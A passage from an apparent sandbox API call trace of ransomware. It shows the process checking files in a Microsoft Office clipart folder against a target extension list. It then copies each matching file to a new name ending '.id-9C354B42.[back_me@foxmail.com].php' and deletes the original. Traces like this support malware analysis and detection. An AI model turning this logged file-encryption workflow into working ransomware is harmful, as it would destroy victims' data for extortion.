[0262.048] lstrlenW (lpString=".xls") returned 4 [0262.048] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0262.048] lstrlenW (lpString=".xlsx") returned 5 [0262.048] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0262.048] lstrlenW (lpString=".ppt") returned 4 [0262.048] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0262.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63 [0262.048] lstrlenW (lpString=".zip") returned 4 [0262.048] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0262.048] lstrlenW (lpString=".rar") returned 4 [0262.049] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0262.049] lstrlenW (lpString=".bz2") returned 4 [0262.049] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0262.049] lstrlenW (lpString=".7z") returned 3 [0262.049] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0262.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63 [0262.049] lstrlenW (lpString=".dbf") returned 4 [0262.049] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0262.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63 [0262.049] lstrlenW (lpString=".1cd") returned 4 [0262.049] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0262.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63 [0262.049] lstrlenW (lpString=".jpg") returned 4 [0262.049] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0262.049] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0262.049] lstrlenW (lpString="J0107746.WMF") returned 12 [0262.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107746.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0262.050] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=4788) returned 1 [0262.050] CloseHandle (hObject=0x208) returned 1 [0262.050] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107746.wmf")) returned 0x20 [0262.051] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107746.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0262.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107746.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0262.051] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.051] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107746.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc [0262.051] GetLastError () returned 0x0 [0262.051] ReadFile (in: hFile=0x208, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x12b4, lpOverlapped=0x0) returned 1 [0262.172] WriteFile (in: hFile=0x3cc, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x12c0, lpOverlapped=0x0) returned 1 [0262.173] ReadFile (in: hFile=0x208, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0262.173] WriteFile (in: hFile=0x3cc, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0262.173] SetEndOfFile (hFile=0x3cc) returned 1 [0262.173] CloseHandle (hObject=0x3cc) returned 1 [0262.173] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.173] SetEndOfFile (hFile=0x208) returned 1 [0262.176] CloseHandle (hObject=0x208) returned 1 [0262.176] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0262.189] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107746.wmf")) returned 1 [0262.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63 [0262.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63 [0262.194] lstrlenW (lpString=".doc") returned 4 [0262.194] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0262.194] lstrlenW (lpString=".docx") returned 5 [0262.194] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0262.194] lstrlenW (lpString=".pdf") returned 4 [0262.194] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0262.194] lstrlenW (lpString=".xls") returned 4 [0262.194] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0262.194] lstrlenW (lpString=".xlsx") returned 5 [0262.194] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0262.194] lstrlenW (lpString=".ppt") returned 4 [0262.194] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0262.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63 [0262.194] lstrlenW (lpString=".zip") returned 4 [0262.194] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0262.194] lstrlenW (lpString=".rar") returned 4 [0262.194] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0262.195] lstrlenW (lpString=".bz2") returned 4 [0262.195] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0262.195] lstrlenW (lpString=".7z") returned 3 [0262.195] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0262.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63 [0262.195] lstrlenW (lpString=".dbf") returned 4 [0262.195] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0262.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63 [0262.195] lstrlenW (lpString=".1cd") returned 4 [0262.195] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0262.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63 [0262.195] lstrlenW (lpString=".jpg") returned 4 [0262.195] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0262.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63 [0262.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63 [0262.195] lstrlenW (lpString=".doc") returned 4 [0262.195] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0262.195] lstrlenW (lpString=".docx") returned 5 [0262.195] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0262.195] lstrlenW (lpString=".pdf") returned 4 [0262.195] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0262.195] lstrlenW (lpString=".xls") returned 4 [0262.195] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0262.195] lstrlenW (lpString=".xlsx") returned 5 [0262.195] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0262.195] lstrlenW (lpString=".ppt") returned 4 [0262.195] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0262.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63 [0262.195] lstrlenW (lpString=".zip") returned 4 [0262.195] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0262.195] lstrlenW (lpString=".rar") returned 4 [0262.195] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0262.196] lstrlenW (lpString=".bz2") returned 4 [0262.196] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0262.196] lstrlenW (lpString=".7z") returned 3 [0262.196] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0262.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63 [0262.196] lstrlenW (lpString=".dbf") returned 4 [0262.196] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0262.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63 [0262.196] lstrlenW (lpString=".1cd") returned 4 [0262.196] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0262.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63 [0262.196] lstrlenW (lpString=".jpg") returned 4 [0262.196] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0262.196] lstrcmpiW (lpString1=".JPG", lpString2=".php") returned -1 [0262.196] lstrlenW (lpString="J0145373.JPG") returned 12 [0262.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145373.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4 [0262.196] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=17867) returned 1 [0262.196] CloseHandle (hObject=0x3c4) returned 1 [0262.196] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145373.jpg")) returned 0x20 [0262.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145373.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0262.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145373.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4 [0262.197] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.197] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145373.jpg.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0262.197] GetLastError () returned 0x0 [0262.197] ReadFile (in: hFile=0x3c4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x45cb, lpOverlapped=0x0) returned 1 [0262.212] WriteFile (in: hFile=0x354, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x45d0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x45d0, lpOverlapped=0x0) returned 1 [0262.213] ReadFile (in: hFile=0x3c4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0262.213] WriteFile (in: hFile=0x354, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0262.213] SetEndOfFile (hFile=0x354) returned 1 [0262.213] CloseHandle (hObject=0x354) returned 1 [0262.213] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.213] SetEndOfFile (hFile=0x3c4) returned 1 [0262.216] CloseHandle (hObject=0x3c4) returned 1 [0262.216] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0262.216] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145373.jpg")) returned 1 [0262.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63 [0262.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63 [0262.217] lstrlenW (lpString=".doc") returned 4 [0262.217] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0262.217] lstrlenW (lpString=".docx") returned 5 [0262.217] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1 [0262.217] lstrlenW (lpString=".pdf") returned 4 [0262.217] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0262.217] lstrlenW (lpString=".xls") returned 4 [0262.217] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0262.217] lstrlenW (lpString=".xlsx") returned 5 [0262.217] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1 [0262.217] lstrlenW (lpString=".ppt") returned 4 [0262.217] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0262.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63 [0262.217] lstrlenW (lpString=".zip") returned 4 [0262.217] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0262.217] lstrlenW (lpString=".rar") returned 4 [0262.217] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0262.217] lstrlenW (lpString=".bz2") returned 4 [0262.217] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0262.217] lstrlenW (lpString=".7z") returned 3 [0262.217] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0262.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63 [0262.217] lstrlenW (lpString=".dbf") returned 4 [0262.217] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0262.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63 [0262.217] lstrlenW (lpString=".1cd") returned 4 [0262.217] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0262.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63 [0262.217] lstrlenW (lpString=".jpg") returned 4 [0262.217] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0262.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63 [0262.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63 [0262.218] lstrlenW (lpString=".doc") returned 4 [0262.218] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0262.218] lstrlenW (lpString=".docx") returned 5 [0262.218] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1 [0262.218] lstrlenW (lpString=".pdf") returned 4 [0262.218] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0262.218] lstrlenW (lpString=".xls") returned 4 [0262.218] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0262.218] lstrlenW (lpString=".xlsx") returned 5 [0262.218] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1 [0262.218] lstrlenW (lpString=".ppt") returned 4 [0262.218] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0262.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63 [0262.218] lstrlenW (lpString=".zip") returned 4 [0262.218] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0262.218] lstrlenW (lpString=".rar") returned 4 [0262.218] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0262.218] lstrlenW (lpString=".bz2") returned 4 [0262.218] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0262.218] lstrlenW (lpString=".7z") returned 3 [0262.218] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0262.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63 [0262.218] lstrlenW (lpString=".dbf") returned 4 [0262.218] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0262.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63 [0262.218] lstrlenW (lpString=".1cd") returned 4 [0262.218] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0262.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63 [0262.218] lstrlenW (lpString=".jpg") returned 4 [0262.218] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0262.219] lstrcmpiW (lpString1=".JPG", lpString2=".php") returned -1 [0262.219] lstrlenW (lpString="J0145810.JPG") returned 12 [0262.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145810.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0262.230] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=36792) returned 1 [0262.230] CloseHandle (hObject=0x38c) returned 1 [0262.230] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145810.jpg")) returned 0x20 [0262.231] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145810.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0262.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145810.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0262.231] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.231] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145810.jpg.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0262.232] GetLastError () returned 0x0 [0262.232] ReadFile (in: hFile=0x38c, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x8fb8, lpOverlapped=0x0) returned 1 [0262.234] WriteFile (in: hFile=0x37c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x8fc0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x8fc0, lpOverlapped=0x0) returned 1 [0262.235] ReadFile (in: hFile=0x38c, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0262.235] WriteFile (in: hFile=0x37c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0262.235] SetEndOfFile (hFile=0x37c) returned 1 [0262.236] CloseHandle (hObject=0x37c) returned 1 [0262.236] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0262.236] SetEndOfFile (hFile=0x38c) returned 1 [0262.238] CloseHandle (hObject=0x38c) returned 1 [0262.238] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0262.238] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145810.jpg")) returned 1 [0262.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63 [0262.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63 [0262.239] lstrlenW (lpString=".doc") returned 4 [0262.239] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0262.239] lstrlenW (lpString=".docx") returned 5 [0262.239] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1 [0262.239] lstrlenW (lpString=".pdf") returned 4 [0262.239] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0262.239] lstrlenW (lpString=".xls") returned 4 [0262.239] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0262.239] lstrlenW (lpString=".xlsx") returned 5 [0262.239] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1 [0262.239] lstrlenW (lpString=".ppt") returned 4 [0262.239] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0262.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63 [0262.239] lstrlenW (lpString=".zip") returned 4 [0262.239] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0262.239] lstrlenW (lpString=".rar") returned 4 [0262.239] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0262.239] lstrlenW (lpString=".bz2") returned 4 [0262.239] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0262.239] lstrlenW (lpString=".7z") returned 3 [0262.239] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0262.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63 [0262.239] lstrlenW (lpString=".dbf") returned 4 [0262.239] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0262.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63 [0262.239] lstrlenW (lpString=".1cd") returned 4 [0262.239] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0262.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63 [0262.239] lstrlenW (lpString=".jpg") returned 4 [0262.240] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0262.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63 [0262.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63 [0262.240] lstrlenW (lpString=".doc") returned 4 [0262.240] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0262.240] lstrlenW (lpString=".docx") returned 5 [0262.240] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1 [0262.240] lstrlenW (lpString=".pdf") returned 4 [0262.240] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0262.240] lstrlenW (lpString=".xls") returned 4 [0262.240] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0262.240] lstrlenW (lpString=".xlsx") returned 5 [0262.240] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1 [0262.240] lstrlenW (lpString=".ppt") returned 4 [0262.240] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0262.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 63 [0262.240] lstrlenW (lpString=".zip") returned 4 [0262.240] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0262.240] lstrlenW (lpString=".rar") returned 4 [0262.240] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0262.240] lstrlenW (lpString=".bz2") returned 4 [0262.240] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0262.240] lstrlenW (lpString=".7z") returned 3 [0262.240] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0262.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") 